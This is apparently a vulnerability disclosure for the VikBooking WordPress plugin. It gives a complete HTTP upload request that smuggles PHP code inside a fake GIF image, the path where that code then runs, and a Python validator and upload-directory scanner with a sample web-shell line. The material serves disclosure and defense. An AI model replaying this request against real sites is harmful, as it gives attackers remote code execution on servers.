The plugin does not properly validate uploaded images, allowing high-privilege users such as administrators to upload PHP files disguised as images (a file with a valid GIF header followed by PHP code) into a web-accessible directory, where the server executes them.
Edit/add a Characteristic (/wp-admin/admin.php?option=com_vikbooking&task=carat) and upload a fake GIF with PHP code in it as the Characteristic Image:

POST /wp-admin/admin.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------119541905442224294322517652959
Content-Length: 1469
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caratname"

WiFi
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caraticon"; filename="phpinfo.php"
Content-Type: image/gif

GIF89a;
<?php phpinfo() ?>
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="resizeto"

250
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="carattextimg"

<i class="fas fa-wifi vbo-icn-carat vbo-pref-color-text"></i>
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="ordering"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="task"

updatecarat
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="whereup"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="option"

com_vikbooking
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="vikwp_nonce"

2817d7732a
-----------------------------119541905442224294322517652959--

The PHP file will then be reachable at https://example.com/m/wp-content/plugins/vikbooking/site/resources/uploads/phpinfo.php
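The PoC works because the upload handler trusts the client-supplied Content-Type (image/gif) and the "GIF89a" prefix while keeping the attacker's .php filename. The following is an added example, not code from the VikBooking plugin or from the submitter, showing the checks an upload handler needs to reject that file and a scanner for the uploads directory that flags anything already written there. It is written in Python rather than the plugin's PHP so it can run stand-alone; the extension allowlist, the magic-byte table, the sample file names and their contents are all constructed for the example.

```python
import os
import re
import tempfile

# Extensions the characteristic-image upload should accept, and the magic
# bytes each one must start with (GIF, JPEG and PNG only, for this example).
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
# A PHP open tag anywhere in the body; the PoC hides one after a GIF header,
# so a magic-byte check on its own would have passed it.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
# Name segments that PHP-capable servers may hand to the interpreter even
# when they are not the last extension (shell.php.gif on Apache + AddHandler).
PHP_SEGMENT = re.compile(r"^(php\d?|phtml|phar)$", re.IGNORECASE)


def validate_image_upload(filename, data):
    """Return (accepted, reason) for one uploaded file.

    Cheap name checks first, then the magic bytes for the claimed extension,
    then a scan for PHP tags so a valid image header cannot smuggle code.
    """
    segments = os.path.basename(filename).split(".")
    if len(segments) < 2:
        return False, "no file extension"
    ext = segments[-1].lower()
    if ext not in ALLOWED:
        return False, "extension '%s' not allowed" % ext
    if any(PHP_SEGMENT.match(s) for s in segments[1:-1]):
        return False, "PHP extension hidden in file name"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match a %s header" % ext
    if PHP_TAG.search(data):
        return False, "PHP open tag embedded in image data"
    return True, "ok"


def scan_upload_dir(root):
    """Apply the same rules to every file already under an uploads directory
    (e.g. site/resources/uploads) and return sorted (relative path, reason)
    pairs for files that should not be there."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            ok, reason = validate_image_upload(name, data)
            if not ok:
                findings.append((os.path.relpath(path, root), reason))
    return sorted(findings)


# Constructed sample files for the demo; not taken from any real site.
SAMPLES = {
    "phpinfo.php": b"GIF89a;\n<?php phpinfo() ?>",       # the PoC upload
    "wifi.gif": b"GIF89a" + b"\x00" * 16,                # benign image
    "pool.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,      # benign image
    "shell.php.gif": b"GIF89a" + b"\x00" * 8,            # double extension
    "icon.png": b"GIF89a<?= system($_GET['c']) ?>",      # wrong magic for .png
}


def demo_scan():
    """Write the samples to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLES.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_upload_dir(root)


if __name__ == "__main__":
    for rel, why in demo_scan():
        print("%-16s %s" % (rel, why))
```

The name check alone would already have stopped phpinfo.php; the tag scan is what catches the same payload renamed to wifi.gif, and the segment check catches shell.php.gif. A stricter fix than any of these checks is to re-encode the upload with GD or Imagick and store only the re-encoded image, which discards any trailing PHP whatever the header says; the scanner is the thing to run once on an instance that was exposed, since fixing the handler does not remove files already written.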
UPLOAD
Gabriel3476
Gabriel3476
Yes
2022-04-21
2022-04-21
2022-04-22